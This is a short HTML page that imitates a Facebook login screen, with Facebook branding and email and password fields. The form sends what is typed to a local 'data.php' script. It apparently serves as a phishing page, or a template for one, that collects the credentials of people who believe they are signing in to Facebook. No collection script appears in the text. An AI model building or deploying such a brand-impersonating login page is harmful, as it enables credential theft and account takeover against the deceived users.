<!DOCTYPE html>
<html>
    <head>
        <title>FACEBOOK SETTING</title>
        <link rel="stylesheet" href="facebook.css"/>
    </head>
    <body>
        <header>
            <h1 class="judul">Facebook</h1>
        </header>
        <div class="all">
            <div class="card"><br>
                <h4 class="login-facebook">Login Facebook</h4><br><br>
                <form action="data.php" method="POST">
                    <input class="input" type="text" placeholder="Email or number phone" name="email"><br><br>
                    <input class="input" type="password" placeholder="Password" name="password"><br><br>
                    <input class="btn" type="submit" value="Login" name="submit"><br><br>
                    <a class="forgot-password" href="#">Forgot Password?</a>
                    <br>
                    <br>
                </form>
            </div>
        </div>
    </body>